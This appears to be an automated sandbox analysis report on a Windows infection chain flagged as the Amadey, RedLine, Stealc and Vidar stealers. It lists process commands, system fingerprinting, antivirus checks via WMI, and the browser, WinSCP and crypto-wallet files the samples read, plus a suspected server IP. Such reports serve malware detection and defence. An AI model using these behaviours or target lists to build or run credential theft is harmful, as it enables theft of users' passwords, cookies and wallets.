Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\1000003002\ead6a72944.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7366.tmp\7367.tmp\7368.bat C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"

Source: firefox.exe, 00000028.00000002.2853946051.000000BCB0EBB000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ?ProgmanListenerWindow
Source: axplong.exe, axplong.exe, 0000000A.00000002.2311209476.00000000010C1000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: TProgram Manager
Source: PharmaciesDetection.exe, 00000015.00000003.2671343184.00000000027AB000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	Binary or memory string: @EXITMETHOD@EXITCODEShell_TrayWnd-CALLGUICTRLREGISTERLISTVIEWSORTGUICTRLCREATELISTVIEWITEMGUICTRLCREATETREEVIEWITEMGUICTRLCREATECONTEXTMENUONAUTOITEXITUNREGISTERGUICTRLCREATELISTVIEWGUICTRLCREATEMENUITEMGUICTRLCREATECHECKBOXGUICTRLCREATEMONTHCALGUICTRLCREATEPROGRESSGUICTRLCREATETREEVIEWGUICTRLCREATEGRAPHICSTRINGFROMASCIIARRAYONAUTOITEXITREGISTERGUICTRLCREATETABITEMGUICTRLSETDEFBKCOLORINIREADSECTIONNAMESGUICTRLCREATEBUTTONDLLCALLBACKREGISTERGUICTRLCREATEUPDOWNGUICTRLCREATESLIDERSTRINGREGEXPREPLACEOBJCREATEINTERFACEGUICTRLSENDTODUMMYFILECREATESHORTCUTGUICTRLCREATEINPUTSOUNDSETWAVEVOLUMEFILECREATENTFSLINKGUISETACCELERATORSGUICTRLCREATECOMBOGUICTRLSETDEFCOLORPROCESSSETPRIORITYGUICTRLSETRESIZINGSTRINGTOASCIIARRAYDRIVEGETFILESYSTEMGUICTRLCREATEDUMMYTRAYITEMSETONEVENTGUICTRLCREATERADIOWINMINIMIZEALLUNDOGUICTRLCREATEGROUPGUICTRLCREATELABELAUTOITWINSETTITLEGUICTRLSETBKCOLORAUTOITWINGETTITLEGUICTRLSETGRAPHICGUICTRLCREATEDATEGUICTRLCREATEICONGUICTRLSETONEVENTCONSOLEWRITEERRORDLLCALLBACKGETPTRGUICTRLCREATELISTTRAYITEMGETHANDLEFILEFINDFIRSTFILEGUICTRLCREATEEDITGUICTRLCREATEMENUWINMENUSELECTITEMGUICTRLSETCURSORDLLSTRUCTGETDATASTATUSBARGETTEXTFILERECYCLEEMPTYFILESELECTFOLDERTRAYITEMSETSTATEDLLSTRUCTSETDATATRAYITEMGETSTATEWINGETCLIENTSIZEGUICTRLCREATEAVIHTTPSETUSERAGENTGUICTRLCREATEPICCONTROLGETHANDLEGUIGETCURSORINFOTRAYSETPAUSEICONFILEFINDNEXTFILEINIRENAMESECTIONDLLSTRUCTGETSIZESHELLEXECUTEWAITPROCESSWAITCLOSEGUICTRLCREATETABFILEGETSHORTNAMEWINWAITNOTACTIVEGUICTRLCREATEOBJGUICTRLGETHANDLESTRINGTRIMRIGHTGUICTRLSETLIMITGUICTRLSETIMAGEINIWRITESECTIONCONTROLTREEVIEWAUTOITSETOPTIONGUICTRLSETCOLORDLLSTRUCTGETPTRADLIBUNREGISTERDRIVESPACETOTALGUICTRLSETSTATEWINGETCLASSLISTGUICTRLGETSTATEFILEGETSHORTCUTDLLSTRUCTCREATEPROCESSGETSTATSCONTROLGETFOCUSDLLCALLBACKFREEGUICTRLSETSTYLEFILEREADTOARRAYTRAYITEMSETTEXTCONTROLLISTVIEWTRAYITEMGETTEXTFILEGETENCODINGFILEGETLONGNAMEGUICTRLSENDMSGSENDKEEPACTIVEDRIVESPACEFREEFILEOPENDIALOGGUICTRLRECVMSGCONTROLCOMMANDSTRINGTOBINARYWINMINIMIZEALLSTRINGISXDIGITTRAYSETONEVENTFILESAVEDIALOGDUMMYSPEEDTESTCONTROLGETTEXTMOUSECLICKDRAGGUICTRLSETFONTMOUSEGETCURSORWINGETCARETPOSCONTROLSETTEXTTRAYITEMDELETESTRINGTRIMLEFTDRIVEGETSERIALBINARYTOSTRINGGUICTRLSETDATAINIREADSECTIONUDPCLOSESOCKETCONTROLDISABLETRAYCREATEMENUTCPCLOSESOCKETDLLCALLADDRESSFILEGETVERSIONGUIREGISTERMSGTRAYSETTOOLTIPTRAYCREATEITEMDRIVEGETDRIVESTRINGISASCIISTRINGCOMPARESTRINGISALPHAPROCESSEXISTSSTRINGREVERSESTRINGSTRIPCRSPLASHIMAGEONGUICTRLSETTIPGUISTARTGROUPCONTROLGETPOSFILEGETATTRIBADLIBREGISTERDRIVESETLABELGUICTRLDELETEFILECHANGEDIRFILEWRITELINEPIXELCHECKSUMDRIVEGETLABELGUICTRLSETPOSGUISETBKCOLORPIXELGETCOLORSTRINGISDIGITSTRINGISFLOATWINWAITACTIVESTRINGISALNUMSTRINGISLOWERSTRINGISSPACEGUISETONEVENTSTRINGREPLACESTRINGSTRIPWSCONTROLENABLESTRINGISUPPERWINGETPROCESSFILESETATTRIBCONTROLFOCUSFILEREADLINEPROCESSCLOSEGUISETCURSORSPLASHTEXTONSTRINGFORMATTRAYSETSTATESTRINGREGEXPCONTROLCLICKSHELLEXECUTETRAYSETCLICKWINWAITCLOSEHTTPSETPROXYDRIVEGETTYPEWINGETHANDLECONSOLEWRITEGUIGETSTYLECONTROL
Source: RoamingAEGIJKEHCA.exe, RoamingAEGIJKEHCA.exe, 00000008.00000002.2345735174.00000000005CE000.00000040.00000001.01000000.0000000B.sdmp, explorti.exe, 0000000F.00000002.2374969784.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000010.00000002.2374830999.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: FM/Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C70B341 cpuid

0_2_6C70B341

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00417630

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the installation date of Windows

Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\1000003002\ead6a72944.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\1000003002\ead6a72944.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\lockfile VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\lockfile VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,

0_2_00417420

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_004172F0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_004174D0

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.13.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 9.2.axplong.exe.ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.explorti.exe.9c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.explorti.exe.9c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.axplong.exe.ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RoamingBKKFHIEGDH.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RoamingAEGIJKEHCA.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2345647298.00000000003E1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2374868692.00000000009C1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2334485830.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.2619079052.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2268957784.0000000000A51000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2257667702.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2308246588.0000000000EC1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2334562706.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2265462516.0000000005430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2270527993.0000000005570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2225343744.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2311063767.0000000000EC1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2374750517.00000000009C1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2615701145.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 26.0.buildred.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000000.2683951657.0000000000802000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: buildred.exe PID: 6340, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\buildred[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2420117641.00000000026D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ba77748b9b.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ba77748b9b.exe PID: 8448, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: passphrase.json
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16fons\AppData\Roaming\Binance\.finger-print.fpFm_@.
Source: file.exe	String found in binary or memory: Ethereum
Source: file.exe	String found in binary or memory: file__0.localstorage
Source: file.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\yiaxs5ej.default
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
